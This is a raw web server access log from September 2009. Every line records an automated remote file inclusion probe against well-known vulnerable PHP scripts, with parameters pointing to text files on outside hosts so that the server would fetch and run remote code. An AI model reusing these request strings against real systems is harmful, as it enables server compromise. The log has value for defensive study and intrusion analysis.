211.40.68.132 - - [21/Sep/2009:10:07:10 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:10:07:11 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:10:07:34 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:07:58 -0700] "GET /logs//viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:07:58 -0700] "GET /viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:07:58 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:08:52 -0700] "GET /logs/access_090309.log//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:08:52 -0700] "GET /include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:08:57 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:09:03 -0700] "GET /logs/access_090824.log//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:10:09:07 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [21/Sep/2009:10:09:07 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [21/Sep/2009:10:09:08 -0700] "GET /logs/access.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [21/Sep/2009:10:10:00 -0700] "GET /logs//viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:10:00 -0700] "GET /logs/access.log//viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:10:17 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.23 - - [21/Sep/2009:10:10:27 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.23 - - [21/Sep/2009:10:10:28 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.23 - - [21/Sep/2009:10:10:29 -0700] "GET /logs/access_090223.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.23 - - [21/Sep/2009:10:10:39 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.23 - - [21/Sep/2009:10:10:39 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.23 - - [21/Sep/2009:10:10:57 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:11:05 -0700] "GET /include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:11:05 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:11:05 -0700] "GET /logs/access_090309.log%20%20//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:11:27 -0700] "GET /logs/access_090824.log%20%20//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:10:11:29 -0700] "GET /logs/access_090420.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:10:11:35 -0700] "GET /logs/access_090223.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:10:14:15 -0700] "GET /logs/access_090706.log%20%20//trans/trans.php?trans=en&page=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:10:14:15 -0700] "GET /trans/trans.php?trans=en&page=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:10:14:15 -0700] "GET /logs//trans/trans.php?trans=en&page=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:10:14:33 -0700] "GET /logs/access_090323.log%20%20//trans/trans.php?trans=en&page=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.23 - - [21/Sep/2009:10:15:00 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.39.130.23 - - [21/Sep/2009:10:15:00 -0700] "GET /logs/access.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.228.191.194 - - [21/Sep/2009:10:19:13 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [21/Sep/2009:10:19:13 -0700] "GET /logs/access_090330.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [21/Sep/2009:10:19:13 -0700] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [21/Sep/2009:10:21:09 -0700] "GET /logs/access_090330.log%20%20//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.223.85.28 - - [21/Sep/2009:10:25:50 -0700] "GET /logs/access_090330.log//activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.223.85.28 - - [21/Sep/2009:10:25:50 -0700] "GET /activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.223.85.28 - - [21/Sep/2009:10:25:50 -0700] "GET /logs//activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.223.85.28 - - [21/Sep/2009:10:26:00 -0700] "GET /logs/access_090330.log%20%20//activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.223.85.28 - - [21/Sep/2009:10:26:00 -0700] "GET /activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.223.85.28 - - [21/Sep/2009:10:26:00 -0700] "GET /logs//activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.223.85.28 - - [21/Sep/2009:10:26:44 -0700] "GET /logs/access_090706.log%20%20//activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.187.131.186 - - [21/Sep/2009:10:27:55 -0700] "GET /logs/access_090713.log%20//modules/Forums/admin/admin_smilies.php?phpEx=http://gh0st.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
89.187.131.186 - - [21/Sep/2009:10:27:55 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpEx=http://gh0st.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
89.187.131.186 - - [21/Sep/2009:10:27:55 -0700] "GET /logs//modules/Forums/admin/admin_smilies.php?phpEx=http://gh0st.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
89.187.131.186 - - [21/Sep/2009:10:27:55 -0700] "GET /logs/access_090420.log%20//modules/Forums/admin/admin_smilies.php?phpEx=http://gh0st.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:27:58 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:27:58 -0700] "GET /include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:27:58 -0700] "GET /logs/access_090511.log//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [21/Sep/2009:10:28:02 -0700] "GET /logs//trans/trans.php?trans=en&page=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [21/Sep/2009:10:28:02 -0700] "GET /logs/access_090706.log%20%20//trans/trans.php?trans=en&page=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [21/Sep/2009:10:28:02 -0700] "GET /trans/trans.php?trans=en&page=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [21/Sep/2009:10:28:32 -0700] "GET /logs/access_090323.log%20%20//trans/trans.php?trans=en&page=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [21/Sep/2009:10:29:59 -0700] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.228.191.194 - - [21/Sep/2009:10:29:59 -0700] "GET /logs/access.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.228.191.194 - - [21/Sep/2009:10:29:59 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
220.125.237.35 - - [21/Sep/2009:10:31:40 -0700] "GET /logs/access_090511.log//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:31:40 -0700] "GET /include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:31:41 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.223.85.28 - - [21/Sep/2009:10:31:42 -0700] "GET /activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
63.223.85.28 - - [21/Sep/2009:10:31:45 -0700] "GET /logs/access.log//activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
63.223.85.28 - - [21/Sep/2009:10:31:45 -0700] "GET /logs//activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
220.125.237.35 - - [21/Sep/2009:10:31:46 -0700] "GET /logs/access_090309.log//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:32:37 -0700] "GET /include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:33:53 -0700] "GET /logs/access_090309.log%20%20//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:10:34:44 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:10:34:44 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:10:34:44 -0700] "GET /logs/access_090511.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:35:09 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:35:09 -0700] "GET /include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:35:09 -0700] "GET /logs/access_090309.log%20%20//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:10:35:10 -0700] "GET /logs/access_090309.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:35:10 -0700] "GET /logs/access_090720.log%20%20//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:10:35:14 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://www.naengjung.es.kr/kboard/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:10:35:14 -0700] "GET /viewbody.html?code=http://www.naengjung.es.kr/kboard/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:10:35:14 -0700] "GET /logs//viewbody.html?code=http://www.naengjung.es.kr/kboard/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:10:35:24 -0700] "GET /logs/access.log//viewbody.html?code=http://www.naengjung.es.kr/kboard/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:10:35:56 -0700] "GET /logs/access_090511.log//addevent.inc.php?agendax_path=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:10:35:56 -0700] "GET /addevent.inc.php?agendax_path=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:10:35:56 -0700] "GET /logs//addevent.inc.php?agendax_path=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:10:35:58 -0700] "GET /logs/access_090525.log//addevent.inc.php?agendax_path=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:36:55 -0700] "GET /include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:36:55 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:36:56 -0700] "GET /logs/access_090824.log%20%20//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:10:37:01 -0700] "GET /logs/access_090511.log%20%20//include/mail.inc.php?skin_board_path=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:37:16 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:37:16 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:37:16 -0700] "GET /logs//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 200 4788 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:37:16 -0700] "GET /logs//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 200 4788 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:37:16 -0700] "GET /?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:37:16 -0700] "GET /?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:38:07 -0700] "GET /?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:38:07 -0700] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:38:07 -0700] "GET /logs//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 200 4788 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:38:17 -0700] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:38:17 -0700] "GET /?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:38:17 -0700] "GET /logs//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 200 4788 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:38:34 -0700] "GET /viewbody.html?code=http://singingcamel.com/defacer/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:38:34 -0700] "GET /logs//viewbody.html?code=http://singingcamel.com/defacer/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:38:35 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://singingcamel.com/defacer/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:38:42 -0700] "GET /logs/access.log//viewbody.html?code=http://singingcamel.com/defacer/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:10:40:44 -0700] "GET /step_one.php?server_inc=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:10:40:44 -0700] "GET /logs//step_one.php?server_inc=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:10:40:44 -0700] "GET /logs/access_090629.log//step_one.php?server_inc=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:10:40:44 -0700] "GET /logs/access_090323.log//step_one.php?server_inc=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:41:25 -0700] "GET /viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:41:25 -0700] "GET /logs//viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:41:25 -0700] "GET /logs/access_090824.log%20%20//viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:10:41:35 -0700] "GET /logs/access.log%20%20//viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:10:41:42 -0700] "GET /logs/access_090629.log%20//step_one.php?server_inc=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.187.131.186 - - [21/Sep/2009:10:42:05 -0700] "GET /logs/webcalendar/tools/send_reminders.php?includedir=http://gh0st.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
89.187.131.186 - - [21/Sep/2009:10:42:05 -0700] "GET /logs/access_090420.log%20/webcalendar/tools/send_reminders.php?includedir=http://gh0st.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:42:54 -0700] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:42:54 -0700] "GET /?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:10:42:54 -0700] "GET /logs//?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 200 4788 "-" "Mozilla/5.0" "www.galf.org"
